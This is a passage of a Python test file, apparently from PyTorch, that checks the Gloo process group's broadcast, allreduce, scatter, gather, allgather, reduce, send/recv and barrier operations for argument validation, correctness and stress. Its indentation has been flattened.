store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
xs = [torch.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
def test_broadcast_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = -1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t3], opts)
def _test_broadcast_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# Every rank is root once
for i in range(self.world_size):
# Run with 1 input tensor
x = fn(torch.tensor([self.rank]))
broadcast([x], i, 0)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i]), x)
# Run with 2 input tensors
num = 2
for j in range(num):
xs = [
fn(torch.tensor([self.rank * num + 0.0])),
fn(torch.tensor([self.rank * num + 1.0])),
]
broadcast(xs, i, j)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[0])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[1])
# Test overloaded convenience function
x = torch.tensor([self.rank + 1.0])
work = pg.broadcast(x, root=0)
work.wait()
self.assertEqual(torch.tensor([1.0]), x)
def test_broadcast_basics(self):
self._test_broadcast_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_broadcast_basics_cuda(self):
self._test_broadcast_basics(lambda t: t.clone().cuda())
def _test_broadcast_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [
pg.broadcast(inputs[i], root=(i % self.world_size))
for i in range(len(inputs))
]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
torch.tensor([(i * self.world_size) + (i % self.world_size)]),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_broadcast_stress(self):
inputs = [torch.tensor([i * self.world_size + self.rank]) for i in range(1000)]
self._test_broadcast_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_broadcast_stress_cuda(self):
inputs = [
torch.tensor([i * self.world_size + self.rank]).cuda() for i in range(1000)
]
self._test_broadcast_stress(inputs)
def test_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t3], opts)
def _test_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Single input tests
tests = simple_reduce_tests(self.rank, self.world_size)
for (op, input, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensor = fn(input)
work = pg.allreduce([tensor], opts)
work.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Multi input tests
tests = simple_multi_input_reduce_tests(self.rank, self.world_size)
for (op, inputs, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors, opts)
work.wait()
for tensor in tensors:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Test overloaded convenience function (defaults to using sum)
x = fn(torch.tensor([self.rank + 1.0]))
work = pg.allreduce(x)
work.wait()
self.assertEqual(
torch.tensor([float(self.world_size * (self.world_size + 1) / 2)]), x
)
def test_allreduce_basics(self):
self._test_allreduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allreduce_basics_cuda(self):
self._test_allreduce_basics(lambda t: t.clone().cuda())
def _test_allreduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce(inputs[i]) for i in range(len(inputs))]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allreduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allreduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_allreduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allreduce_stress(inputs)
def test_allreduce_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
t2 = torch.zeros(1, dtype=torch.float64)
t3 = torch.sparse_coo_tensor([[0]], [1], size=(1,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([], opts)
with self.assertRaisesRegex(ValueError, "tensors must all have the same type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout at index"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t3], opts)
with self.assertRaisesRegex(ValueError, "unsupported layout"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t3, t3.clone()], opts)
@skip_if_lt_x_gpu(1)
def test_allreduce_coalesced_checks_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "unsupported device type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1.cuda(), t1.cuda()], opts)
def _test_allreduce_coalesced_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
test_cases = simple_coalesced_reduce_tests(self.rank, self.world_size)
for op, inputs, outputs in test_cases:
opts = c10d.AllreduceCoalescedOptions()
opts.reduceOp = op
tensors = [fn(x) for x in inputs]
work = pg.allreduce_coalesced(tensors, opts)
work.wait()
for result_tensor, expected in zip(tensors, outputs):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(result_tensor, expected)
def test_allreduce_coalesced_basics(self):
self._test_allreduce_coalesced_basics(lambda t: t.clone())
def _test_allreduce_coalesced_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce_coalesced(input) for input in inputs]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
2
* [
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
)
],
inputs[i],
msg="Mismatch in interation {}".format(i),
)
def test_allreduce_coalesced_stress(self):
inputs = [2 * [torch.tensor([i + self.rank])] for i in range(1000)]
self._test_allreduce_coalesced_stress(inputs)
def test_sparse_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1])
t2 = torch.sparse_coo_tensor([[0]], [1], size=(2,))
t3 = torch.sparse_coo_tensor([[0]], [1], size=(4,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t2, t3], opts)
# Sparse allreduce only works with c10d.ReduceOp.SUM.
for op in [c10d.ReduceOp.PRODUCT, c10d.ReduceOp.MIN, c10d.ReduceOp.MAX]:
with self.assertRaisesRegex(ValueError, "unsupported reduction operation"):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
pg.allreduce([t3], opts)
def _test_sparse_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for num_inputs_per_rank in [1, 2]:
tests = simple_sparse_reduce_tests(
self.rank, self.world_size, num_inputs=num_inputs_per_rank
)
for (inputs, outputs) in tests:
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors)
work.wait()
self.assertEqual(tensors, outputs)
self.assertEqual(work.result(), outputs)
def test_sparse_allreduce_basics(self):
self._test_sparse_allreduce_basics(lambda t: t)
@skip_if_lt_x_gpu(2)
def test_sparse_allreduce_basics_cuda(self):
self._test_sparse_allreduce_basics(lambda t: t.clone().cuda())
def test_scatter_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = -1
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = self.world_size
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([t1, t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * self.world_size, [t1] * self.world_size], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect input list size {}. Input list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t2] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t3] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "requires empty input on non-root"):
opts = c10d.ScatterOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.scatter([t1], [[t1] * self.world_size], opts)
def _test_scatter_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank])) for _ in range(self.world_size)]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the scatter root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.scatter([outputs[i]], [input], opts))
else:
work.append(pg.scatter([outputs[i]], [], opts))
# Wait for work to complete
for i in range(self.world_size):
work[i].wait()
self.assertEqual(torch.tensor([i]), outputs[i])
def test_scatter_basics(self):
self._test_scatter_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_scatter_basics_cuda(self):
self._test_scatter_basics(lambda t: t.clone().cuda())
def _test_scatter_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
outputs = [
[fn(torch.tensor([-1])) for _ in range(self.world_size)]
for _ in range(len(inputs))
]
work_handles = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = root
if root == self.rank:
work = pg.scatter(
[outputs[i][root]], [[fn(e) for e in inputs[i]]], opts
)
else:
work = pg.scatter([outputs[i][root]], [], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
self.assertEqual(
torch.tensor([iter + root]),
outputs[iter][root],
msg=("Mismatch in iteration %d for rank %d" % (iter, root)),
)
def test_scatter_stress(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone())
@unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/15963")
@skip_if_lt_x_gpu(2)
def test_scatter_stress_cuda(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone().cuda())
def test_gather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = -1
pg.gather([], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = self.world_size
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [t1, t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * self.world_size, [t1] * self.world_size], [t1], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect output list size {}. Output list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t2] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t3] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "requires empty output on non-root"):
opts = c10d.GatherOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.gather([[t1] * self.world_size], [t1], opts)
def _test_gather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank]))]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the gather root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.gather([outputs], input, opts))
else:
work.append(pg.gather([], input, opts))
# Wait for work to complete
expected = [torch.tensor([rank]) for rank in range(self.world_size)]
for i in range(self.world_size):
work[i].wait()
if i == self.rank:
self.assertEqual(expected, outputs)
def test_gather_basics(self):
self._test_gather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_basics_cuda(self):
self._test_gather_basics(lambda t: t.clone().cuda())
def _test_gather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
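# In iteration i, rank j contributes torch.tensor([i + j]) (see test_gather_stress),
# so the root expects to gather [i + 0, ..., i + world_size - 1].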
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = root
if root == self.rank:
work = pg.gather(outputs[i], [fn(inputs[i])], opts)
else:
work = pg.gather([], [fn(inputs[i])], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
self.assertEqual(
expected_outputs[iter],
outputs[iter],
msg=("Mismatch in iteration %d for root %d" % (iter, root)),
)
def test_gather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty input tensor list"):
pg.allgather([], [])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([], [t1])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([[t1] * self.world_size, [t1] * self.world_size], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size - 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size + 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t2]
)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t3]
)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather([([t1, t2] * (self.world_size))[: self.world_size]], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather([([t1, t3] * (self.world_size))[: self.world_size]], [t1])
def _test_allgather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Run with N input tensors per rank
for n in [1, 2, 3]:
input = [fn(torch.tensor([n * self.rank + i])) for i in range(n)]
output = [
[fn(torch.tensor([-1])) for _ in range(n * self.world_size)]
for _ in range(n)
]
expected_output = [
[torch.tensor([i]) for i in range(n * self.world_size)]
for _ in range(n)
]
work = pg.allgather(output, input)
work.wait()
self.assertEqual(expected_output, output)
def test_allgather_basics(self):
self._test_allgather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_basics_cuda(self):
self._test_allgather_basics(lambda t: t.clone().cuda())
def _test_allgather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
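# As in the gather stress test, rank j contributes torch.tensor([i + j]) in
# iteration i, so every rank expects [i + 0, ..., i + world_size - 1].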
for i in range(len(inputs)):
work = pg.allgather(outputs[i], [fn(inputs[i])])
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
expected_outputs[i],
outputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allgather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
dummy_input = [torch.zeros([1], dtype=torch.float32)]
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size)
]
# One of the output tensors does not match the input list (wrong size).
dummy_output_lists[0] = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
ValueError, "invalid size of output tensor at index 0"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# One of the output tensors does not match the input list (wrong dtype).
dummy_output_lists[0] = [torch.zeros([1], dtype=torch.float64)]
with self.assertRaisesRegex(ValueError, "invalid tensor type at index 0"):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output lists have too many elements
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size + 1)
]
with self.assertRaisesRegex(
ValueError, "output lists should be equal to world size"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output is not a list of lists.
dummy_output_lists = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
RuntimeError, "Invalid function argument.*output_tensor_lists"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
def test_reduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.reduce([t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element tensor list"
):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.reduce([t1, t1], opts)
def _test_reduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for (op, input, output) in simple_reduce_tests(self.rank, self.world_size):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.reduceOp = op
opts.rootRank = root
tmp = fn(input)
work = pg.reduce([tmp], opts)
work.wait()
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tmp)
def test_reduce_basics(self):
self._test_reduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_reduce_basics_cuda(self):
self._test_reduce_basics(lambda t: t.clone().cuda())
def _test_reduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.rootRank = root
tmp = inputs[i].clone()
outputs.append(tmp)
work = pg.reduce([tmp], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
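# Rank r contributed inputs[iter] = iter + r, so the reduced sum is
# iter * world_size + world_size * (world_size - 1) / 2.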
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(iter * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
outputs[i],
msg=("Mismatch in iteration %d with root rank %d" % (iter, root)),
)
def test_reduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_reduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_reduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_reduce_stress(inputs)
def test_send_recv_all_to_all(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
inputs = [torch.tensor([self.rank]) for _ in range(self.world_size)]
outputs = [torch.tensor([-1]) for _ in range(self.world_size)]
# Issue sends
send_work = []
for i in range(self.world_size):
if i == self.rank:
continue
send_work.append(pg.send([inputs[i]], i, 0))
# Issue recvs
recv_work = []
for i in range(self.world_size):
if i == self.rank:
continue
recv_work.append(pg.recv([outputs[i]], i, 0))
# Wait for sends to complete
for work in send_work:
work.wait()
self.assertTrue(work.is_completed())
# Wait for recvs to complete
for work in recv_work:
work.wait()
self.assertTrue(work.is_completed())
# Test that every output other than our own contains the respective rank
for i in range(self.world_size):
if i == self.rank:
continue
self.assertEqual(torch.tensor([i]), outputs[i])
def test_barrier_implies_wait(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Kick off allreduce operations
size = (100, 100)
num = 16
tensors = [torch.full(size, float(i)) for i in range(num)]
for tensor in tensors:
# Note: leak the returned work handle
pg.allreduce(tensor)
# Barrier should ensure all previous work has completed
pg.barrier().wait()
for i, tensor in enumerate(tensors):
self.assertEqual(torch.full(size, float(i * self.world_size)), tensor)
@skip_if_win32()
def test_round_robin(self):
num_process_groups = 2
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore(str(i), store), self.rank, self.world_size, self.opts()
)
for i in range(num_process_groups)
]
)
# Run a few collectives so that each underlying process group gets used at least once
for _ in range(num_process_groups + 1):
tensor = torch.full([100, 100], float(self.rank))
pg.broadcast(tensor, root=0).wait()
self.assertEqual(torch.full([100, 100], 0.0), tensor)
@skip_if_win32()
def test_round_robin_create_destroy(self):
store = c10d.FileStore(self.file_name, self.world_size)
def create(num, prefix):
return c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore("%s/%d" % (prefix, i), store),
self.rank,
self.world_size,
self.opts()
)
for i in range(num)
]
)
# Run create/use/destroy twice
for i in range(2):
num_process_groups = 2
pg = create(num=num_process_groups, prefix=i)
for _ in range(3):
tensor = torch.ones([10, 10])
pg.allreduce(tensor).wait()
self.assertEqual(torch.full([10, 10], float(self.world_size)), tensor)
del pg
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
